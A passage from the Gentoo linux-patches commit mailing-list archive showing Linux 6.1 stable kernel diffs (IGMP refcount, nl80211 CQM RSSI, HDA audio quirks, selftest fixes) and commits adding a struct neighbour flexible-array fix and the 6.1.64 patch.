+-	BIT_MASK_DESCR(IRQD_MSI_NOMASK_QUIRK),
+ 
+ 	BIT_MASK_DESCR(IRQD_FORWARDED_TO_VCPU),
+ 
+diff --git a/kernel/irq/msi.c b/kernel/irq/msi.c
+index 77e513e2e5da7..4e462b5f7bbe8 100644
+--- a/kernel/irq/msi.c
++++ b/kernel/irq/msi.c
+@@ -807,7 +807,6 @@ static int msi_handle_pci_fail(struct irq_domain *domain, struct msi_desc *desc,
+ 
+ #define VIRQ_CAN_RESERVE	0x01
+ #define VIRQ_ACTIVATE		0x02
+-#define VIRQ_NOMASK_QUIRK	0x04
+ 
+ static int msi_init_virq(struct irq_domain *domain, int virq, unsigned int vflags)
+ {
+@@ -816,8 +815,6 @@ static int msi_init_virq(struct irq_domain *domain, int virq, unsigned int vflag
+ 
+ 	if (!(vflags & VIRQ_CAN_RESERVE)) {
+ 		irqd_clr_can_reserve(irqd);
+-		if (vflags & VIRQ_NOMASK_QUIRK)
+-			irqd_set_msi_nomask_quirk(irqd);
+ 
+ 		/*
+ 		 * If the interrupt is managed but no CPU is available to
+@@ -877,15 +874,8 @@ int __msi_domain_alloc_irqs(struct irq_domain *domain, struct device *dev,
+ 	 * Interrupt can use a reserved vector and will not occupy
+ 	 * a real device vector until the interrupt is requested.
+ 	 */
+-	if (msi_check_reservation_mode(domain, info, dev)) {
++	if (msi_check_reservation_mode(domain, info, dev))
+ 		vflags |= VIRQ_CAN_RESERVE;
+-		/*
+-		 * MSI affinity setting requires a special quirk (X86) when
+-		 * reservation mode is active.
+-		 */
+-		if (domain->flags & IRQ_DOMAIN_MSI_NOMASK_QUIRK)
+-			vflags |= VIRQ_NOMASK_QUIRK;
+-	}
+ 
+ 	msi_for_each_desc(desc, dev, MSI_DESC_NOTASSOCIATED) {
+ 		ops->set_desc(&arg, desc);
+diff --git a/lib/errname.c b/lib/errname.c
+index 67739b174a8cc..0c336b0f12f60 100644
+--- a/lib/errname.c
++++ b/lib/errname.c
+@@ -111,9 +111,6 @@ static const char *names_0[] = {
+ 	E(ENOSPC),
+ 	E(ENOSR),
+ 	E(ENOSTR),
+-#ifdef ENOSYM
+-	E(ENOSYM),
+-#endif
+ 	E(ENOSYS),
+ 	E(ENOTBLK),
+ 	E(ENOTCONN),
+@@ -144,9 +141,6 @@ static const char *names_0[] = {
+ #endif
+ 	E(EREMOTE),
+ 	E(EREMOTEIO),
+-#ifdef EREMOTERELEASE
+-	E(EREMOTERELEASE),
+-#endif
+ 	E(ERESTART),
+ 	E(ERFKILL),
+ 	E(EROFS),
+diff --git a/net/ipv4/igmp.c b/net/ipv4/igmp.c
+index cbc4816ed7d83..ac53ef7eec915 100644
+--- a/net/ipv4/igmp.c
++++ b/net/ipv4/igmp.c
+@@ -216,8 +216,10 @@ static void igmp_start_timer(struct ip_mc_list *im, int max_delay)
+ 	int tv = prandom_u32_max(max_delay);
+ 
+ 	im->tm_running = 1;
+-	if (!mod_timer(&im->timer, jiffies+tv+2))
+-		refcount_inc(&im->refcnt);
++	if (refcount_inc_not_zero(&im->refcnt)) {
++		if (mod_timer(&im->timer, jiffies + tv + 2))
++			ip_ma_put(im);
++	}
+ }
+ 
+ static void igmp_gq_start_timer(struct in_device *in_dev)
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index e1accacc6f233..ee980965a7cfb 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -297,6 +297,7 @@ struct cfg80211_cqm_config {
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
+ 	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
++	bool use_range_api;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index b19b5acfaf3a9..42c858219b341 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12574,10 +12574,6 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int i, n, low_index;
+ 	int err;
+ 
+-	/* RSSI reporting disabled? */
+-	if (!cqm_config)
+-		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+-
+ 	/*
+ 	 * Obtain current RSSI value if possible, if not and no RSSI threshold
+ 	 * event has been received yet, we should receive an event after a
+@@ -12652,18 +12648,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
+-	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
+-		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
+-			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+-
+-		return rdev_set_cqm_rssi_config(rdev, dev,
+-						thresholds[0], hysteresis);
+-	}
+-
+-	if (!wiphy_ext_feature_isset(&rdev->wiphy,
+-				     NL80211_EXT_FEATURE_CQM_RSSI_LIST))
+-		return -EOPNOTSUPP;
+-
+ 	if (n_thresholds == 1 && thresholds[0] == 0) /* Disabling */
+ 		n_thresholds = 0;
+ 
+@@ -12671,6 +12655,20 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	old = rcu_dereference_protected(wdev->cqm_config,
+ 					lockdep_is_held(&wdev->mtx));
+ 
++	/* if already disabled just succeed */
++	if (!n_thresholds && !old)
++		return 0;
++
++	if (n_thresholds > 1) {
++		if (!wiphy_ext_feature_isset(&rdev->wiphy,
++					     NL80211_EXT_FEATURE_CQM_RSSI_LIST) ||
++		    !rdev->ops->set_cqm_rssi_range_config)
++			return -EOPNOTSUPP;
++	} else {
++		if (!rdev->ops->set_cqm_rssi_config)
++			return -EOPNOTSUPP;
++	}
++
+ 	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+@@ -12685,13 +12683,26 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		memcpy(cqm_config->rssi_thresholds, thresholds,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
++		cqm_config->use_range_api = n_thresholds > 1 ||
++					    !rdev->ops->set_cqm_rssi_config;
+ 
+ 		rcu_assign_pointer(wdev->cqm_config, cqm_config);
++
++		if (cqm_config->use_range_api)
++			err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev,
++						       thresholds[0],
++						       hysteresis);
+ 	} else {
+ 		RCU_INIT_POINTER(wdev->cqm_config, NULL);
++		/* if enabled as range also disable via range */
++		if (old->use_range_api)
++			err = rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+ 	}
+ 
+-	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+ 	if (err) {
+ 		rcu_assign_pointer(wdev->cqm_config, old);
+ 		kfree_rcu(cqm_config, rcu_head);
+@@ -18758,10 +18769,11 @@ void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
+ 	wdev_lock(wdev);
+ 	cqm_config = rcu_dereference_protected(wdev->cqm_config,
+ 					       lockdep_is_held(&wdev->mtx));
+-	if (!wdev->cqm_config)
++	if (!cqm_config)
+ 		goto unlock;
+ 
+-	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
++	if (cqm_config->use_range_api)
++		cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+ 	rssi_level = cqm_config->last_rssi_event_value;
+ 	rssi_event = cqm_config->last_rssi_event_type;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 54f4b593a1158..5aaf3dcecf27e 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2215,6 +2215,8 @@ static const struct snd_pci_quirk power_save_denylist[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x36a7, "Lenovo C50 All in one", 0),
+ 	/* https://bugs.launchpad.net/bugs/1821663 */
+ 	SND_PCI_QUIRK(0x1631, 0xe017, "Packard Bell NEC IMEDIA 5204", 0),
++	/* KONTRON SinglePC may cause a stall at runtime resume */
++	SND_PCI_QUIRK(0x1734, 0x1232, "KONTRON SinglePC", 0),
+ 	{}
+ };
+ #endif /* CONFIG_PM */
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index b63e12b661996..d1944c83b03a2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -1986,6 +1986,7 @@ enum {
+ 	ALC887_FIXUP_ASUS_AUDIO,
+ 	ALC887_FIXUP_ASUS_HMIC,
+ 	ALCS1200A_FIXUP_MIC_VREF,
++	ALC888VD_FIXUP_MIC_100VREF,
+ };
+ 
+ static void alc889_fixup_coef(struct hda_codec *codec,
+@@ -2539,6 +2540,13 @@ static const struct hda_fixup alc882_fixups[] = {
+ 			{}
+ 		}
+ 	},
++	[ALC888VD_FIXUP_MIC_100VREF] = {
++		.type = HDA_FIXUP_PINCTLS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x18, PIN_VREF100 }, /* headset mic */
++			{}
++		}
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+@@ -2608,6 +2616,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x106b, 0x4a00, "Macbook 5,2", ALC889_FIXUP_MBA11_VREF),
+ 
+ 	SND_PCI_QUIRK(0x1071, 0x8258, "Evesham Voyaeger", ALC882_FIXUP_EAPD),
++	SND_PCI_QUIRK(0x10ec, 0x12d8, "iBase Elo Touch", ALC888VD_FIXUP_MIC_100VREF),
+ 	SND_PCI_QUIRK(0x13fe, 0x1009, "Advantech MIT-W101", ALC886_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x1458, 0xa002, "Gigabyte EP45-DS3/Z87X-UD3H", ALC889_FIXUP_FRONT_HP_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1458, 0xa0b8, "Gigabyte AZ370-Gaming", ALC1220_FIXUP_GB_DUAL_CODECS),
+@@ -3255,6 +3264,7 @@ static void alc_disable_headset_jack_key(struct hda_codec *codec)
+ 	case 0x10ec0230:
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 		alc_write_coef_idx(codec, 0x48, 0x0);
+ 		alc_update_coef_idx(codec, 0x49, 0x0045, 0x0);
+@@ -3284,6 +3294,7 @@ static void alc_enable_headset_jack_key(struct hda_codec *codec)
+ 	case 0x10ec0230:
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 		alc_write_coef_idx(codec, 0x48, 0xd011);
+ 		alc_update_coef_idx(codec, 0x49, 0x007f, 0x0045);
+@@ -6495,6 +6506,7 @@ static void alc_combo_jack_hp_jd_restart(struct hda_codec *codec)
+ 	case 0x10ec0236:
+ 	case 0x10ec0255:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 		alc_update_coef_idx(codec, 0x1b, 0x8000, 1 << 15); /* Reset HP JD */
+ 		alc_update_coef_idx(codec, 0x1b, 0x8000, 0 << 15);
+diff --git a/tools/arch/parisc/include/uapi/asm/errno.h b/tools/arch/parisc/include/uapi/asm/errno.h
+index 87245c584784e..8d94739d75c67 100644
+--- a/tools/arch/parisc/include/uapi/asm/errno.h
++++ b/tools/arch/parisc/include/uapi/asm/errno.h
+@@ -75,7 +75,6 @@
+ 
+ /* We now return you to your regularly scheduled HPUX. */
+ 
+-#define ENOSYM		215	/* symbol does not exist in executable */
+ #define	ENOTSOCK	216	/* Socket operation on non-socket */
+ #define	EDESTADDRREQ	217	/* Destination address required */
+ #define	EMSGSIZE	218	/* Message too long */
+@@ -101,7 +100,6 @@
+ #define	ETIMEDOUT	238	/* Connection timed out */
+ #define	ECONNREFUSED	239	/* Connection refused */
+ #define	EREFUSED	ECONNREFUSED	/* for HP's NFS apparently */
+-#define	EREMOTERELEASE	240	/* Remote peer released connection */
+ #define	EHOSTDOWN	241	/* Host is down */
+ #define	EHOSTUNREACH	242	/* No route to host */
+ 
+diff --git a/tools/testing/selftests/net/af_unix/diag_uid.c b/tools/testing/selftests/net/af_unix/diag_uid.c
+index 5b88f7129fea4..79a3dd75590e8 100644
+--- a/tools/testing/selftests/net/af_unix/diag_uid.c
++++ b/tools/testing/selftests/net/af_unix/diag_uid.c
+@@ -148,7 +148,6 @@ void receive_response(struct __test_metadata *_metadata,
+ 		.msg_iov = &iov,
+ 		.msg_iovlen = 1
+ 	};
+-	struct unix_diag_req *udr;
+ 	struct nlmsghdr *nlh;
+ 	int ret;
+ 
+diff --git a/tools/testing/selftests/net/cmsg_sender.c b/tools/testing/selftests/net/cmsg_sender.c
+index 24b21b15ed3fb..6ff3e732f449f 100644
+--- a/tools/testing/selftests/net/cmsg_sender.c
++++ b/tools/testing/selftests/net/cmsg_sender.c
+@@ -416,9 +416,9 @@ int main(int argc, char *argv[])
+ {
+ 	struct addrinfo hints, *ai;
+ 	struct iovec iov[1];
++	unsigned char *buf;
+ 	struct msghdr msg;
+ 	char cbuf[1024];
+-	char *buf;
+ 	int err;
+ 	int fd;
+ 
+diff --git a/tools/testing/selftests/net/ipsec.c b/tools/testing/selftests/net/ipsec.c
+index 9a8229abfa026..be4a30a0d02ae 100644
+--- a/tools/testing/selftests/net/ipsec.c
++++ b/tools/testing/selftests/net/ipsec.c
+@@ -2263,7 +2263,7 @@ static int check_results(void)
+ 
+ int main(int argc, char **argv)
+ {
+-	unsigned int nr_process = 1;
++	long nr_process = 1;
+ 	int route_sock = -1, ret = KSFT_SKIP;
+ 	int test_desc_fd[2];
+ 	uint32_t route_seq;
+@@ -2284,7 +2284,7 @@ int main(int argc, char **argv)
+ 			exit_usage(argv);
+ 		}
+ 
+-		if (nr_process > MAX_PROCESSES || !nr_process) {
++		if (nr_process > MAX_PROCESSES || nr_process < 1) {
+ 			printk("nr_process should be between [1; %u]",
+ 					MAX_PROCESSES);
+ 			exit_usage(argv);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.c b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+index 7df6b9b6f9a84..e6b514cb7bdda 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+@@ -18,6 +18,7 @@
+ 
+ #include <sys/ioctl.h>
+ #include <sys/poll.h>
++#include <sys/random.h>
+ #include <sys/sendfile.h>
+ #include <sys/stat.h>
+ #include <sys/socket.h>
+@@ -1050,15 +1051,11 @@ again:
+ 
+ static void init_rng(void)
+ {
+-	int fd = open("/dev/urandom", O_RDONLY);
+ 	unsigned int foo;
+ 
+-	if (fd > 0) {
+-		int ret = read(fd, &foo, sizeof(foo));
+-
+-		if (ret < 0)
+-			srand(fd + foo);
+-		close(fd);
++	if (getrandom(&foo, sizeof(foo), 0) == -1) {
++		perror("getrandom");
++		exit(1);
+ 	}
+ 
+ 	srand(foo);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_inq.c b/tools/testing/selftests/net/mptcp/mptcp_inq.c
+index 8672d898f8cda..218aac4673212 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_inq.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_inq.c
+@@ -18,6 +18,7 @@
+ #include <time.h>
+ 
+ #include <sys/ioctl.h>
++#include <sys/random.h>
+ #include <sys/socket.h>
+ #include <sys/types.h>
+ #include <sys/wait.h>
+@@ -519,15 +520,11 @@ static int client(int unixfd)
+ 
+ static void init_rng(void)
+ {
+-	int fd = open("/dev/urandom", O_RDONLY);
+ 	unsigned int foo;
+ 
+-	if (fd > 0) {
+-		int ret = read(fd, &foo, sizeof(foo));
+-
+-		if (ret < 0)
+-			srand(fd + foo);
+-		close(fd);
++	if (getrandom(&foo, sizeof(foo), 0) == -1) {
++		perror("getrandom");
++		exit(1);
+ 	}
+ 
+ 	srand(foo);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-01 10:36 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-01 10:36 UTC (permalink / raw
  To: gentoo-commits

commit:     c7a3f75078a457fe0d157a98bcdbe94b5f19b329
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec  1 10:35:13 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec  1 10:35:13 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c7a3f750

neighbour: Fix __randomize_layout crash in struct neighbour

Bug: https://bugs.gentoo.org/918128

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...ix_randomize_layout_crash_in_struct_neigh.patch | 44 ++++++++++++++++++++++
 2 files changed, 48 insertions(+)

diff --git a/0000_README b/0000_README
index 85eaeddf..8892941f 100644
--- a/0000_README
+++ b/0000_README
@@ -315,6 +315,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2010_Fix_randomize_layout_crash_in_struct_neigh.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=45b3fae4675d
+Desc:   neighbour: Fix __randomize_layout crash in struct neighbour
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2010_Fix_randomize_layout_crash_in_struct_neigh.patch b/2010_Fix_randomize_layout_crash_in_struct_neigh.patch
new file mode 100644
index 00000000..8ee50b2f
--- /dev/null
+++ b/2010_Fix_randomize_layout_crash_in_struct_neigh.patch
@@ -0,0 +1,44 @@
+From 45b3fae4675dc1d4ee2d7aefa19d85ee4f891377 Mon Sep 17 00:00:00 2001
+From: "Gustavo A. R. Silva" <gustavoars@kernel.org>
+Date: Sat, 25 Nov 2023 15:33:58 -0600
+Subject: neighbour: Fix __randomize_layout crash in struct neighbour
+
+Previously, one-element and zero-length arrays were treated as true
+flexible arrays, even though they are actually "fake" flex arrays.
+The __randomize_layout would leave them untouched at the end of the
+struct, similarly to proper C99 flex-array members.
+
+However, this approach changed with commit 1ee60356c2dc ("gcc-plugins:
+randstruct: Only warn about true flexible arrays"). Now, only C99
+flexible-array members will remain untouched at the end of the struct,
+while one-element and zero-length arrays will be subject to randomization.
+
+Fix a `__randomize_layout` crash in `struct neighbour` by transforming
+zero-length array `primary_key` into a proper C99 flexible-array member.
+
+Fixes: 1ee60356c2dc ("gcc-plugins: randstruct: Only warn about true flexible arrays")
+Closes: https://lore.kernel.org/linux-hardening/20231124102458.GB1503258@e124191.cambridge.arm.com/
+Signed-off-by: Gustavo A. R. Silva <gustavoars@kernel.org>
+Reviewed-by: Kees Cook <keescook@chromium.org>
+Tested-by: Joey Gouly <joey.gouly@arm.com>
+Link: https://lore.kernel.org/r/ZWJoRsJGnCPdJ3+2@work
+Signed-off-by: Paolo Abeni <pabeni@redhat.com>
+---
+ include/net/neighbour.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 07022bb0d44d4b..0d28172193fa63 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -162,7 +162,7 @@ struct neighbour {
+ 	struct rcu_head		rcu;
+ 	struct net_device	*dev;
+ 	netdevice_tracker	dev_tracker;
+-	u8			primary_key[0];
++	u8			primary_key[];
+ } __randomize_layout;
+ 
+ struct neigh_ops {
+-- 
+cgit 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-28 17:51 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-28 17:51 UTC (permalink / raw
  To: gentoo-commits

commit:     cb35ae44d3310992c09e6d0d40d171522cdec1d1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Nov 28 17:51:11 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Nov 28 17:51:11 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cb35ae44

Linux patch 6.1.64

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1063_linux-6.1.64.patch | 12540 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 12544 insertions(+)

diff --git a/0000_README b/0000_README
index 56731b47..85eaeddf 100644
--- a/0000_README
+++ b/0000_README
@@ -295,6 +295,10 @@ Patch:  1062_linux-6.1.63.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.63
 
+Patch:  1063_linux-6.1.64.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.64
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1063_linux-6.1.64.patch b/1063_linux-6.1.64.patch
new file mode 100644
index 00000000..d0dc09a8
--- /dev/null
+++ b/1063_linux-6.1.64.patch
@@ -0,0 +1,12540 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 31af352b4762d..4ad60e127e048 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5671,6 +5671,13 @@
+ 			This feature may be more efficiently disabled
+ 			using the csdlock_debug- kernel parameter.
+ 
++	smp.panic_on_ipistall= [KNL]
++			If a csd_lock_timeout extends for more than
++			the specified number of milliseconds, panic the
++			system.  By default, let CSD-lock acquisition
++			take as long as they take.  Specifying 300,000
++			for this value provides a 5-minute timeout.
++
+ 	smsc-ircc2.nopnp	[HW] Don't use PNP to discover SMC devices
+ 	smsc-ircc2.ircc_cfg=	[HW] Device configuration I/O port
+ 	smsc-ircc2.ircc_sir=	[HW] SIR base I/O port
+diff --git a/Makefile b/Makefile
+index 7c69293b7e059..97c75ae364cdf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 63
++SUBLEVEL = 64
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/include/asm/exception.h b/arch/arm/include/asm/exception.h
+index 58e039a851af0..3c82975d46db3 100644
+--- a/arch/arm/include/asm/exception.h
++++ b/arch/arm/include/asm/exception.h
+@@ -10,10 +10,6 @@
+ 
+ #include <linux/interrupt.h>
+ 
+-#ifdef CONFIG_FUNCTION_GRAPH_TRACER
+ #define __exception_irq_entry	__irq_entry
+-#else
+-#define __exception_irq_entry
+-#endif
+ 
+ #endif /* __ASM_ARM_EXCEPTION_H */
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 9ee9e17eb2ca0..ea70eb960565e 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -1304,6 +1304,8 @@ choice
+ config CPU_BIG_ENDIAN
+ 	bool "Build big-endian kernel"
+ 	depends on !LD_IS_LLD || LLD_VERSION >= 130000
++	# https://github.com/llvm/llvm-project/commit/1379b150991f70a5782e9a143c2ba5308da1161c
++	depends on AS_IS_GNU || AS_VERSION >= 150000
+ 	help
+ 	  Say Y if you plan on running a kernel with a big-endian userspace.
+ 
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi b/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi
+index 348d9e3a91252..b53d74aee12ad 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-ls208xa.dtsi
+@@ -1186,26 +1186,34 @@
+ 			dma-coherent;
+ 		};
+ 
+-		usb0: usb@3100000 {
+-			status = "disabled";
+-			compatible = "snps,dwc3";
+-			reg = <0x0 0x3100000 0x0 0x10000>;
+-			interrupts = <0 80 0x4>; /* Level high type */
+-			dr_mode = "host";
+-			snps,quirk-frame-length-adjustment = <0x20>;
+-			snps,dis_rxdet_inp3_quirk;
+-			snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
+-		};
++		bus: bus {
++			#address-cells = <2>;
++			#size-cells = <2>;
++			compatible = "simple-bus";
++			ranges;
++			dma-ranges = <0x0 0x0 0x0 0x0 0x100 0x00000000>;
++
++			usb0: usb@3100000 {
++				compatible = "snps,dwc3";
++				reg = <0x0 0x3100000 0x0 0x10000>;
++				interrupts = <0 80 0x4>; /* Level high type */
++				dr_mode = "host";
++				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,dis_rxdet_inp3_quirk;
++				snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
++				status = "disabled";
++			};
+ 
+-		usb1: usb@3110000 {
+-			status = "disabled";
+-			compatible = "snps,dwc3";
+-			reg = <0x0 0x3110000 0x0 0x10000>;
+-			interrupts = <0 81 0x4>; /* Level high type */
+-			dr_mode = "host";
+-			snps,quirk-frame-length-adjustment = <0x20>;
+-			snps,dis_rxdet_inp3_quirk;
+-			snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
++			usb1: usb@3110000 {
++				compatible = "snps,dwc3";
++				reg = <0x0 0x3110000 0x0 0x10000>;
++				interrupts = <0 81 0x4>; /* Level high type */
++				dr_mode = "host";
++				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,dis_rxdet_inp3_quirk;
++				snps,incr-burst-type-adjustment = <1>, <4>, <8>, <16>;
++				status = "disabled";
++			};
+ 		};
+ 
+ 		ccn@4000000 {
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index c3492a3831558..43ff8f1f1475c 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -169,7 +169,7 @@
+ 	smem {
+ 		compatible = "qcom,smem";
+ 		memory-region = <&smem_region>;
+-		hwlocks = <&tcsr_mutex 0>;
++		hwlocks = <&tcsr_mutex 3>;
+ 	};
+ 
+ 	soc: soc {
+@@ -248,7 +248,7 @@
+ 
+ 		tcsr_mutex: hwlock@1905000 {
+ 			compatible = "qcom,ipq6018-tcsr-mutex", "qcom,tcsr-mutex";
+-			reg = <0x0 0x01905000 0x0 0x1000>;
++			reg = <0x0 0x01905000 0x0 0x20000>;
+ 			#hwlock-cells = <1>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 3f7cf3fdd319f..3d8e5ba51ce0d 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -90,7 +90,7 @@
+ 			reg = <0x0 0x4ab00000 0x0 0x00100000>;
+ 			no-map;
+ 
+-			hwlocks = <&tcsr_mutex 0>;
++			hwlocks = <&tcsr_mutex 3>;
+ 		};
+ 
+ 		memory@4ac00000 {
+diff --git a/arch/loongarch/include/asm/percpu.h b/arch/loongarch/include/asm/percpu.h
+index ad8d88494554a..302f0e33975a2 100644
+--- a/arch/loongarch/include/asm/percpu.h
++++ b/arch/loongarch/include/asm/percpu.h
+@@ -28,7 +28,7 @@ static inline void set_my_cpu_offset(unsigned long off)
+ #define __my_cpu_offset __my_cpu_offset
+ 
+ #define PERCPU_OP(op, asm_op, c_op)					\
+-static inline unsigned long __percpu_##op(void *ptr,			\
++static __always_inline unsigned long __percpu_##op(void *ptr,		\
+ 			unsigned long val, int size)			\
+ {									\
+ 	unsigned long ret;						\
+@@ -59,7 +59,7 @@ PERCPU_OP(and, and, &)
+ PERCPU_OP(or, or, |)
+ #undef PERCPU_OP
+ 
+-static inline unsigned long __percpu_read(void *ptr, int size)
++static __always_inline unsigned long __percpu_read(void *ptr, int size)
+ {
+ 	unsigned long ret;
+ 
+@@ -96,7 +96,7 @@ static inline unsigned long __percpu_read(void *ptr, int size)
+ 	return ret;
+ }
+ 
+-static inline void __percpu_write(void *ptr, unsigned long val, int size)
++static __always_inline void __percpu_write(void *ptr, unsigned long val, int size)
+ {
+ 	switch (size) {
+ 	case 1:
+@@ -128,8 +128,8 @@ static inline void __percpu_write(void *ptr, unsigned long val, int size)
+ 	}
+ }
+ 
+-static inline unsigned long __percpu_xchg(void *ptr, unsigned long val,
+-						int size)
++static __always_inline unsigned long __percpu_xchg(void *ptr, unsigned long val,
++						   int size)
+ {
+ 	switch (size) {
+ 	case 1:
+diff --git a/arch/parisc/include/uapi/asm/pdc.h b/arch/parisc/include/uapi/asm/pdc.h
+index 7a90070136e82..8e38a86996fc6 100644
+--- a/arch/parisc/include/uapi/asm/pdc.h
++++ b/arch/parisc/include/uapi/asm/pdc.h
+@@ -472,6 +472,7 @@ struct pdc_model {		/* for PDC_MODEL */
+ 	unsigned long arch_rev;
